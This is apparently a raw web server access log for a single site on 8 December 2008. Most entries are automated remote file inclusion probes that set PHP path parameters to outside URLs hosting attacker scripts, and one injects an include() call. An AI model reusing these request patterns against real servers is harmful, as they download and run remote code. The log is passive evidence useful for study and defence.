94.102.5.56 - - [08/Dec/2008:10:28:28 -0800] "GET /logs/access_080519.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:28:31 -0800] "GET /logs/access_080519.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:28:34 -0800] "GET /logs/access_080903.log/?_zb_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:28:35 -0800] "GET /logs/?_zb_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 200 77025 "-" "libwww-perl/5.805" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:28:36 -0800] "GET /logs/access_080519.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:28:39 -0800] "GET /?_zb_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 200 65555 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:28:43 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:28:43 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:29:38 -0800] "GET /logs/access_080404.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:29:41 -0800] "GET /logs/access_080404.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:29:45 -0800] "GET /logs/access_081005.log/?_zb_path=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:29:47 -0800] "GET /logs/access_080404.log%20%20//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:04 -0800] "GET /content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:04 -0800] "GET /logs/access_080901.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:04 -0800] "GET /logs//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:05 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:06 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.133 - - [08/Dec/2008:10:30:10 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.pluriversia.es/images/response??? HTTP/1.1" 200 77030 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:10 -0800] "GET /logs/access_080505.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.148.95.133 - - [08/Dec/2008:10:30:11 -0800] "GET /?path%5Bdocroot%5D=http://www.pluriversia.es/images/response??? HTTP/1.1" 200 94771 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:20 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:20 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:20 -0800] "GET /logs//header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:30:20 -0800] "GET /header.php?base_folder=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:32 -0800] "GET /logs/access_080901.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:32 -0800] "GET /content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:32 -0800] "GET /logs//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:30:32 -0800] "GET /logs/access_080505.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:30:47 -0800] "GET /logs/access_080207.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:10:30:57 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2853 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:31:03 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:31:04 -0800] "GET /logs//content.php?seite=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:31:04 -0800] "GET /logs/access_070814.log//content.php?seite=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:10:31:04 -0800] "GET /logs/access_071111.log//content.php?seite=http://sior.org/zero/build/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:10 -0800] "GET /announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:10 -0800] "GET /logs//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:11 -0800] "GET /logs/access_080717.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.73.159.237 - - [08/Dec/2008:10:31:20 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.73.159.237 - - [08/Dec/2008:10:31:20 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.73.159.237 - - [08/Dec/2008:10:31:20 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:31:24 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:31:24 -0800] "GET /index.php?option=com_custompages&cpage=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 200 95316 "-" "libwww-perl/5.808" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:31:31 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:31:31 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:31:34 -0800] "GET /logs/access_080513.log//agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:31:35 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [08/Dec/2008:10:31:36 -0800] "GET /index.php?option=com_custompages&cpage=http://thebuckhornbar.com/webcalendar/includes/js/Insiderz/InsiderZ/Insiderz/crutz.txt??? HTTP/1.1" 200 95300 "-" "libwww-perl/5.808" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:10:31:37 -0800] "GET /logs/access_080513.log//frame.php?framefile=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:10:31:38 -0800] "GET /frame.php?framefile=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.229.126.149 - - [08/Dec/2008:10:31:38 -0800] "GET /logs//frame.php?framefile=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:31:39 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:10:31:44 -0800] "GET /logs/access_080330.log//bbs//skin/zero_vote/ask_password.php?dir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:31:45 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:46 -0800] "GET /logs/access_080717.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:46 -0800] "GET /announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:31:46 -0800] "GET /logs//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:31:52 -0800] "GET /logs/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:31:52 -0800] "GET /logs/access_080518.log/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:31:52 -0800] "GET /logs/access_080602.log/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.9.154.58 - - [08/Dec/2008:10:31:52 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.omnia3d.com/projects/locales/en/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.9.154.58 - - [08/Dec/2008:10:31:52 -0800] "GET /errors.php?error=http://www.omnia3d.com/projects/locales/en/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.9.154.58 - - [08/Dec/2008:10:31:52 -0800] "GET /logs/errors.php?error=http://www.omnia3d.com/projects/locales/en/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:31:59 -0800] "GET /logs/access_070814.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
72.248.189.82 - - [08/Dec/2008:10:32:00 -0800] "GET /logs/access_080408.log//agendax/addevent.inc.php?agendax_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.154.58 - - [08/Dec/2008:10:32:05 -0800] "GET /logs/access_081120.log/errors.php?error=http://www.omnia3d.com/projects/locales/en/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:32:21 -0800] "GET /logs/access_071111.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:32:23 -0800] "GET /logs/access_080722.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:10:32:24 -0800] "GET /logs/access_071111.log//content.php?seite=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:10:32:27 -0800] "GET /logs/access_080109.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:32:34 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:32:36 -0800] "GET /logs/access_080602.log%20%20/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.0.131.13 - - [08/Dec/2008:10:32:36 -0800] "GET /logs/access_080518.log%20%20/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:10:32:49 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:10:32:53 -0800] "GET /logs/access_080722.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:10:33:00 -0800] "GET /logs/access_081125.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:10:33:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.118 - - [08/Dec/2008:10:33:01 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.oao-avtodorstroy.ru/admin/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:10:33:56 -0800] "GET /logs/access_080518.log/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:10:33:56 -0800] "GET /logs/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:10:33:56 -0800] "GET /logs/access_080602.log/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:34:02 -0800] "GET /show.php?page=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:34:02 -0800] "GET /logs/show.php?page=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:34:02 -0800] "GET /logs/access_080602.log/show.php?page=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:10:34:09 -0800] "GET /logs/access_080522.log/show.php?page=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
65.55.211.27 - - [08/Dec/2008:10:34:18 -0800] "GET /blog/wp-content/uploads/dmulk_westoc08_actual.gdb HTTP/1.1" 200 714378 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
69.73.159.237 - - [08/Dec/2008:10:34:19 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://serv.roscan.net/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:34:33 -0800] "GET /logs/access_080416.log%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:10:34:49 -0800] "GET /logs/access_080518.log%20%20/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:10:34:49 -0800] "GET /logs/access_080626.log%20%20/htmltonuke.php?filnavn=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
93.80.139.121 - - [08/Dec/2008:10:34:51 -0800] "GET /logs/access_080228.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/doni_they/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
174.133.193.50 - - [08/Dec/2008:10:35:08 -0800] "GET /logs/access_080905.log//administrator/components/com_virtuemart/classes/htmlTools.class.php?mosConfig_absolute_path=http://www.buycheaperwebhosting.com/biex/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
174.133.193.50 - - [08/Dec/2008:10:35:08 -0800] "GET /logs//administrator/components/com_virtuemart/classes/htmlTools.class.php?mosConfig_absolute_path=http://www.buycheaperwebhosting.com/biex/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:35:21 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 200 77031 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:35:23 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 200 94812 "-" "libwww-perl/5.805" "www.dmulk.com"
195.246.199.254 - - [08/Dec/2008:10:35:26 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.142.211.175 - - [08/Dec/2008:10:35:33 -0800] "GET /logs//modules/Forums/////////admin/admin_db_utilities.php?phpbb_root_path=http://www.ccdomcol.com/crisannissa///.../.thumb/.../del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.211.175 - - [08/Dec/2008:10:35:34 -0800] "GET /modules/Forums/////////admin/admin_db_utilities.php?phpbb_root_path=http://www.ccdomcol.com/crisannissa///.../.thumb/.../del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:35:39 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:35:39 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:35:39 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:35:45 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:35:57 -0800] "GET /logs/access_080717.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:35:57 -0800] "GET /announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:35:57 -0800] "GET /logs//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.102.5.56 - - [08/Dec/2008:10:35:58 -0800] "GET /logs/access_080404.log//modules/My_eGallery/public/inc/?HCL_path=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.218.85.18 - - [08/Dec/2008:10:36:06 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:36:08 -0800] "GET /logs/access_080717.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:36:08 -0800] "GET /announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:36:08 -0800] "GET /logs//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:37:13 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:10:37:13 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:37:23 -0800] "GET /logs/access_080722.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:10:37:24 -0800] "GET /logs/access_080722.log%20%20//announcements.php?phpraid_dir=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:10:38:03 -0800] "GET /logs/access_080519.log/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
